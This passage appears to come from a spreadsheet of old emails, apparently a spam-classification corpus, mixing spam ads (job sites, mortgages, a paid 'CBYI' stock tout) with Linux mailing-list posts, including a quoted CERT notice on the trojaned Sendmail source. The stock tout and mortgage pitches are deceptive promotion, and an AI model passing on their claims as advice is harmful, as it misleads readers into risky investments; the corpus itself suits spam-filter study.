 call 618-288-6661 for more information.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;font face="Arial" size="2"&gt;to be taken off of our list
 &lt;a href="mailto:l1l12345a1@btamail.net.cn"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The devices are there now, thank Gordon for reporting the problem (and as I
 &gt; said, you were the only one). Any further comments are very welcome!
 &gt; 
 &gt; Download : http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
 &gt; New spec : http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
 Ahh, wonderful!  Just tried out these and *finally* got sound working
 with my Abit TH7II-RAID's integrated audio.  I've been pulling hair
 together with the (helpful) OpenSound people for quite some time now,
 but we've failed to get sound to work, either with the drivers included
 in kernel, or the commercial OSS.
 Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
 the box (on vanilla Valhalla w/latest errata).
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Summer Job Interviews. . . .
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------ack1234
 Content-Type: multipart/alternative; boundary="----alt_border_1"
 ------alt_border_1
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Greetings!
 If you're thinking about a new job, now's the time to
 aggressively pick up your search. Many people slow
 their job search donw in summer months when in fact
 it's the best time to look!
 Here's why.  Many companies implement a new direction
 or strategy at the first of the year, resulting in a
 first of the year hiring surge. By mid year, with
 results in hand, companies start hiring again to
 expand on or adjust for the results of their first of
 the year plans.
 While employers start hiring, job seekers start
 slowing their search efforts down. This creates an
 optimal job seeking environment of more jobs and less
 competition!
 To best take advantage of this situation you should give
 yourself massive exposure by signing up to all the top
 career sites as soon as possible. Of course it will take
 a little time, but it's well worth it. The top career
 sites are visited by 1.5 million employers and recruiters
 daily - And collectively list millions of jobs.
 If you want to save 60 hours of research and data entry,
 try a service called ResumeRabbit.com.  They instantly
 post your resume to 75 the top career sites at once.
 You'll find this service at http://start.resumerabbit.com
 With this service you fill out one simple form in about
 15 minutes and you'll be instantly seen on Monster.com,
 HotJobs.com, Job.com CareerBuilder.com, Dice.com and more!
 When searching for a new job, it's important to work
 smart and cover a lot of ground. Today's serious job
 seeker must take a multi-pronged approach to succeed.
 This should include networking, reading all the
 classifieds, posting your resume on all the top career
 sites and searching job listings on these sites daily.
 We recommend you try http://start.resumerabbit.com
 It's a quality service that delivers what it promises.
 &gt;&gt;From mid November to mid January, the holidays have
 a "slowing down" effect on hiring. Since the job search
 process can often be several months, waiting until the
 end of summer to get started may push your new job off
 well after the new year.  Now's the optimum time to
 aggressively mount your search!
 Sincerely,
 Steve Adler
 stephen.adler@allexecs.org
 ========================================================
 The staff of AllExecs.com have years of recruiting
 experience and may from time to time send you a review of
 career tips and tools that have helped others in their job
 search. If you'd rather not receive these reviews go to
 http://www.allexecs.com/unsubscribe
 ========================================================
 ------alt_border_1
 Content-Type: text/html; charset="ISO-8859-1"
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Allexecs.org&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Courier New" size="2"&gt;Greetings!&lt;br&gt;
 &lt;br&gt;
 If you're thinking about a new job, now's the time to
 aggressively pick up your search. Many people slow
 their job search donw in summer months when in fact
 it's the best time to look!&lt;br&gt;
 &lt;br&gt;
 Here's why.  Many companies implement a new direction
 or strategy at the first of the year, resulting in a
 first of the year hiring surge. By mid year, with
 results in hand, companies start hiring again to
 expand on or adjust for the results of their first of
 the year plans.&lt;br&gt;
 &lt;br&gt;
 While employers start hiring, job seekers start
 slowing their search efforts down. This creates an
 optimal job seeking environment of more jobs and less
 competition!&lt;br&gt;
 &lt;br&gt;
 To best take advantage of this situation you should give
 yourself massive exposure by signing up to all the top
 career sites as soon as possible. Of course it will take
 a little time, but it's well worth it. The top career
 sites are visited by 1.5 million employers and recruiters
 daily - And collectively list millions of jobs.&lt;br&gt;
 &lt;br&gt;
 If you want to save 60 hours of research and data entry,
 try a service called ResumeRabbit.com.  They instantly
 post your resume to 75 the top career sites at once.
 You'll find this service at http://start.resumerabbit.com&lt;br&gt;
 &lt;br&gt;
 With this service you fill out one simple form in about
 15 minutes and you'll be instantly seen on Monster.com,
 HotJobs.com, Job.com CareerBuilder.com, Dice.com and more!&lt;br&gt;
 &lt;br&gt;
 When searching for a new job, it's important to work
 smart and cover a lot of ground. Today's serious job
 seeker must take a multi-pronged approach to succeed.
 This should include networking, reading all the
 classifieds, posting your resume on all the top career
 sites and searching job listings on these sites daily.&lt;br&gt;
 &lt;br&gt;
 We recommend you try http://start.resumerabbit.com&lt;br&gt;
 It's a quality service that delivers what it promises.&lt;br&gt;
 &lt;br&gt;
 &gt;&gt;From mid November to mid January, the holidays have
 a "slowing down" effect on hiring. Since the job search
 process can often be several months, waiting until the
 end of summer to get started may push your new job off
 well after the new year.  Now's the optimum time to
 aggressively mount your search!&lt;br&gt;
 &lt;br&gt;
 Sincerely,&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Steve Adler&lt;br&gt;
 stephen.adler@allexecs.org&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 ========================================================&lt;br&gt;
 The staff of AllExecs.com have years of recruiting
 experience and may from time to time send you a review of
 career tips and tools that have helped others in their job
 search. If you'd rather not receive these reviews go to 
 &lt;A HREF="http://www.allexecs.com/unsubscribe"&gt;http://www.allexecs.com/unsubscribe&lt;/A&gt;&lt;br&gt;
 ========================================================&lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------alt_border_1--
 ------ack1234--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ---&gt; Undervalued Company
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 **********
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apt repository authentication: it's time
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Cliped from the latest CERT.org warning list:
 -----------------------------------------------------------------------------------------------
 "I. Description
    The  CERT/CC  has received confirmation that some copies of the source
    code  for  the  Sendmail  package have been modified by an intruder to
    contain a Trojan horse.
    The following files were modified to include the malicious code:
      sendmail.8.12.6.tar.Z
      sendmail.8.12.6.tar.gz
    These  files  began  to  appear  in  downloads  from  the  FTP  server
    ftp.sendmail.org  on  or  around  September  28,  2002.  The  Sendmail
    development  team  disabled  the  compromised FTP server on October 6,
    2002  at  approximately  22:15  PDT.  It  does  not appear that copies
    downloaded  via  HTTP contained the Trojan horse; however, the CERT/CC
    encourages  users  who  may  have  downloaded the source code via HTTP
    during  this  time  period  to take the steps outlined in the Solution
    section as a precautionary measure."
      OK, it's now time to work out the PGP securing of apt repository traffic. I've never gotten anything but "sitename.whatever will not be authenticated" until running Redhat 8.0 when I get something about having "No Key" for various files.
     What's it take to ensure we're covered against this kind of childish/moronic/Microsoft-era problems?
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest,
 weil es eine lange, ssse Fahrt ist. 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the money you need while mortgage rates are down.
</t>
  </si>
  <si>
    <t xml:space="preserve">iieo
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Mortgage companies make you wait&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table height=3D"1" cellSpacing=3D"0" width=3D"540" border=3D"0" style=3D=
 "border-collapse: collapse" bordercolor=3D"#111111" cellpadding=3D"0"&gt;
     &lt;tr&gt;
       &lt;td colSpan=3D"2"&gt;
       &lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" color=3D"#008000"&gt;&lt;big&gt;&lt;st=
 rong&gt;
       Mortgage companies make you wait...They Demand to Interview you...Th=
 ey &lt;u&gt;
       Intimidate&lt;/u&gt; you...They &lt;u&gt;Humiliate&lt;/u&gt; you...And All of That is =
 While 
       They Decide If They Even Want to Do Business With You...&lt;/strong&gt;&lt;/b=
 ig&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000000" size=3D"5"&gt;&lt;strong&gt;We Tu=
 rn the 
       Tables on Them...&lt;br&gt;
       Now, You're In Charge&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000000"&gt;&lt;small&gt;&lt;b&gt;Just Fill Out =
 Our Simple 
       Form and They Will Have to Compete For Your Business...&lt;/b&gt;&lt;/small&gt;&lt;=
 br&gt;
       &lt;br&gt;
       &lt;big&gt;&lt;big&gt;&lt;strong&gt;
       &lt;a target=3D"_NEW" href=3D"http://208.251.89.19/mortgage/mailer2"&gt;
       CLICK HERE FOR THE FORM&lt;/a&gt;&lt;/strong&gt;&lt;/big&gt;&lt;/big&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td vAlign=3D"center" width=3D"50%"&gt;&lt;strong&gt;
       &lt;font face=3D"Tahoma" color=3D"#000000" size=3D"2"&gt;We have hundreds =
 of loan 
       programs, including:&lt;/font&gt;&lt;/strong&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D=
 "#008000" size=3D"2"&gt;&lt;ul&gt;
         &lt;li&gt;Refinance &lt;/li&gt;
         &lt;li&gt;Debt Consolidation &lt;/li&gt;
         &lt;li&gt;Home Improvement &lt;/li&gt;
         &lt;li&gt;Second Mortgages &lt;/li&gt;
         &lt;li&gt;Cash Out&lt;/li&gt;
         &lt;li&gt;Home Equity Loan&lt;/li&gt;
       &lt;/ul&gt;
       &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td vAlign=3D"top" width=3D"50%"&gt;
       &lt;blockquote dir=3D"ltr" style=3D"border-left: 2px solid #000000; mar=
 gin-left: 0px; margin-right: 0px; padding-left: 25px"&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;p align=3D"justify"&gt;You can save &lt;i&gt;&lt;b&gt;&lt;u&gt;Thousands Of Dollars&lt;=
 /u&gt;&lt;/b&gt;&lt;/i&gt; 
           over the course of your loan with just a 1/4 of 1% Drop in your =
 rate!&lt;br&gt;
           &lt;br&gt;
           &lt;br&gt;
           &lt;br&gt;
           &lt;br&gt;
           &lt;br&gt;
           &lt;br&gt;
 &amp;nbsp;&lt;/p&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/blockquote&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td colSpan=3D"2"&gt;&lt;br&gt;
 &amp;nbsp;&lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" color=3D"#0000ff"&gt;&lt;big&gt;&lt;bi=
 g&gt;&lt;strong&gt;
       &lt;a target=3D"_NEW" href=3D"http://208.251.89.19/mortgage/mailer2"&gt;
       CLICK HERE FOR THE FORM&lt;/a&gt;&lt;/strong&gt;&lt;/big&gt;&lt;/big&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" color=3D"#000000" size=3D"=
 3"&gt;&lt;strong&gt;You 
       will be contacted with an offer within 24 hours from the time you fi=
 ll out 
       the form!&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face=3D"arial,helvetica" size=3D1&gt;&lt;br&gt;Please know that we do=
  not want to send you information regarding our special offers if you do n=
 ot wish to receive it.  If you would no longer like us to contact you or y=
 ou feel that you have received this email in error, you may &lt;a href=3D"htt=
 p://208.251.89.19/remove"&gt;click here to unsubscribe&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 xcps
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: remove
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Seriously though, it spurs the question: should this list be moderated ? 
 &gt; (and the next question: if "yes", who wants to co-moderate ?)
 No...the list has been on target i'd say about 95% of the time.
 Iff it starts being a problem, consider it. Right now, John's
 right - this remove thread is taking more time than any remove
 requests have in the entire past year.
 One thing you may want to consider (if feasible) - BugTraq's
 adopted a technique by which they add headers to each message
 indicating where to email to remove. The catch: the mail is
 not sent to "majordomo" - it is sent to "listname-remove"@domain.
 I've found that useful when I can't remember exactly which mail
 addr I used to signup (since my email addr never shows up in
 a received message, and I have multiple addresses going to the
 same box).
 For all that, remember, even if you put the actual removal
 instructions right in the bottom of your email, you will
 _still_ get the clueless asking you how to remove. (Trust me,
 we've been there.)
 Thomas
 -
 nessus@list.nessus.org: general discussions about Nessus.
 * To unsubscribe, send a mail to majordomo@list.nessus.org with
 "unsubscribe nessus" in the body.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: apt 0.5.7 on RH 7.x
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 Are there any reasons _not_ to use the new apt releases on RH 7.x?
 -- 
 reiserfsck ist bekannt dafr, da es leere Dateisysteme zurcklt.
 Gut, formaljuristisch hat er das Dateisystem in einen wohldefinierten
 Zustand versetzt, aber ... nunja.  Man erwartet schon irgendwie, da
 noch ein paar Daten drauf sind danach.      -- Felix v. Leitner, dasr
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: *-ADV-  LOWEST  MORTGAGE RATES IN AMERICA  - 8976-- NJOU7
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_186_75347104803485215881
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 If you wish to unsubscribe from this list, please send an email to =
 remove@nouce1.com  with REMOVE in the Subject line 
 or call us at 1-800-866-667-5399, or write us at: NOUCE1, 6822 22nd Ave. N., =
 St Petersburg, FL 33710-3918.
 =3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==
 =3D==3D==3D==3D==3D==3D==3D==3D==3D==
 LOWEST MORTGAGE RATES IN AMERICA
 EASY ONLINE FORM: LESS THAN 5 MINUTES TO COMPLETE
 =3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==3D==
 FOR MORE INFORMATION PLEASE GO TO 
 http://www.thezs.com/0066/index.html
 RATES ARE LOW - DON'T MISS THIS OPPORTUNITY
 Good or Bad Credit. 
 Ideal Time to Purchase a Home. 
 Refinance your Existing Mortgage - Lower your Current Payments. 
 Convert your Adjustable Rate Mortgage (ARM) to a low fixed loan. 
 Convert your ARM to a better ARM. 
 Convert your 30 yr Mortgage to a 15 yr Mortgage - build equity faster. 
 Need Cash? Home equity loan rates are priced right. 
 Save Hundreds of Dollars Each Month - Rates are Great - Don't Miss This =
 Opportunity.
 //////////////////////////////////////////////////////////////////////
 FOR MORE INFORMATION PLEASE GO TO 
 http://www.thezs.com/0066/index.html
 /////////////////////////////////////////////////////////////////////
 ------=_NextPart_186_75347104803485215881
 Content-Type: text/html;
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;SOURCE LENDING&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY text=3D#000000 bgColor=3D#ffffff&gt;
 3:09:40 AM
 gen
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;HR width=3D"98%"&gt;
     &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;DIV align=3Dcenter&gt;&lt;O:P&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;&lt;FONT color=3D#000000&gt;If =
 you 
       wish to unsubscribe from this list, please &lt;A 
       href=3D"mailto:remove@nouce1.com?subject=3DREMOVE"&gt;Click Here&lt;/A&gt; and send 
       this email address &lt;/FONT&gt;&lt;/SPAN&gt;&lt;FONT color=3D#000000&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;or call us at 
       &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/O:P&gt;&lt;/DIV&gt;
       &lt;DIV align=3Dcenter&gt;&lt;O:P&gt;&lt;FONT color=3D#000000&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;1-800-866-667-5399, or =
 write 
       us at: NOUCE1, 6822 22nd Ave. N., St Petersburg, FL 
       33710-3918.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/O:P&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;HR width=3D"98%"&gt;
     &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;P&gt;&lt;FONT face=3D"Times New Roman" color=3Dblack size=3D3&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 12pt; COLOR: black"&gt;&lt;A 
       href=3D"http://www.thezs.com/0066/index.html"&gt;&lt;SPAN 
       style=3D"TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG =
 id=3D_x0000_i1029 
       height=3D30 src=3D"http://www.thezs.com/0066/blackbar.gif" width=3D500 
       align=3DabsMiddle vspace=3D10 border=3D0&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;TABLE class=3DMsoNormalTable 
       style=3D"mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in" 
       cellSpacing=3D0 cellPadding=3D0 border=3D0&gt;
         &lt;TBODY&gt;
